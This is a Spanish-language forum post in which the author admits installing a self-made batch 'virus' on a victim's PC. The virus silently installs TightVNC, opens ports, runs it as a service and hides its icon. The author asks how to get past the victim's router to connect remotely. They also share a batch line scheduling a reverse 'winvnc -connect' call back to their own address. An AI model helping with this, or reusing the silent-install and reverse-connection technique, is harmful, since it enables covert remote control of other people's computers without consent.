Queria hacerle Dos pregunta a una comunidad tan experta por que los novatos nos nutrimos de los más expertos

Bueno mi pregunta son dos la primera
Hice un virus batch con el TIGHTVNC lo he probado y funciona perfectamente hace todo con un doble clic instala tightvnc luego abre los puertos lo pone como un servicio de sistema osea cada vez que reinicia sube y le oculta el tray icon al lado del reloj funciona de maravilla.

Logre que se instalara en la pc de una victima pero no podia conectarme entonces me acorde de los puertos de router puse la ip de la victima en el explorador pero me di cuenta que su router tiene una contraseña y usuario en pocas palabras si no abro los puertos no puedo entrar a la pc ¿Mi pregunta es abra una manera de conectarme con el vncviewer sabiendo ip y sabiendo que el virus esta instalado en la maquina? como puedo burlar en router. osea se el ip se que tiene el virus pero el router me bloquea la entrada.
Ahora buscandole solución al tema anterior quise modificar mi virus y agregarle otras cositas pero el comando at no me funciona en batch ejemplo pongo la siguiente sintaxis
@echo off
at 4:00 /interactive /every:22 "c:\archiv~1\tightvnc\winvnc -connect 10.0.0.1"
exit
lo que me sale es la linea de comando de corrida pero no me corre el comando mienstras que si lo ejecuto por el cmd.exe normal me sale y me agrega la tarea normal pero por batch no me sale quisera saber que estoy haciendo mal lo he itentado de varias forma diferentes pero no me sale

Autor